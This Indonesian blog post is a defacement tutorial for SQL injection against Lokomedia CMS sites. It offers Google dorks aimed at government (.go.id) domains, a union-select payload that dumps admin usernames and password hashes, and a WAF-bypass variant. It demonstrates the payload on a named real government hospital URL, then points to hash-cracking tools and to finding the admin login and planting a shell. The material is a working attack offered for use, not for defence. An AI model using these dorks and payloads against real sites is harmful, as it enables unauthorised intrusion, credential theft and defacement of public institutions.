Assalamualaikum...
Kali ini saya mau share tutorial deface dengan teknik. SQL-i Lokomedia/Sqli lokmed. Alasan saya bikin tutorial ini karena teman/CEO Cowok Tersakiti Team, Show off di grub WA(WhatsApp).Waktu itu we bingung..lalu we tanya... eh ternyata di deface metode SQL-i lokmed.Dan gua di ajarin dia teknik nya.
Berikut langkah-langkah nya:
Dork
---------------------------
- Inurl:"hal-tentang-kami.html" site:.go.id
- Inurl:"statis-1-profil.html" site:.go.id
- Inurl:"kategori-41-metropolitan.html"
- Inurl:"kategori-21-ekonomi.html"
- Inurl:"kategori-39-internasional.html"
- Inurl:/adminweb intitle:Administrator
- Inurl:/terasadmin intitle:Administrator
Kembangin lagi dork nya..biar dapet yang vuln.
Exploit
---------------------------
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
---------------------------
Contoh cara exploit nya:
http://rsam-bkt.sumbarprov.go.id/kategori-31'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-internal.html
Bila situsnya terkena WAF bisa di bypass pake
/*!50000union*/+/*!50000select*/
Contoh
http://rsam-bkt.sumbarprov.go.id/kategori-31'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-internal.html
Sekarang cari user&pw nya di title browser.Jika sudah nemu user&pw nya.
Bisa di hash dengan cara:
- Menggunakan tools Hash Buster
Untuk cara install nya ada disini Bro
- Menggunakan Tools online/Hashkiller
Untuk link hashkiller nya ada disini BroBro
Klo sudah tinggal cari admin login nya.
Untuk tanem shell cari aja sendiri.
Sampai jumpa.....
comment 0 comments:
more_vertsentiment_satisfied Emoticon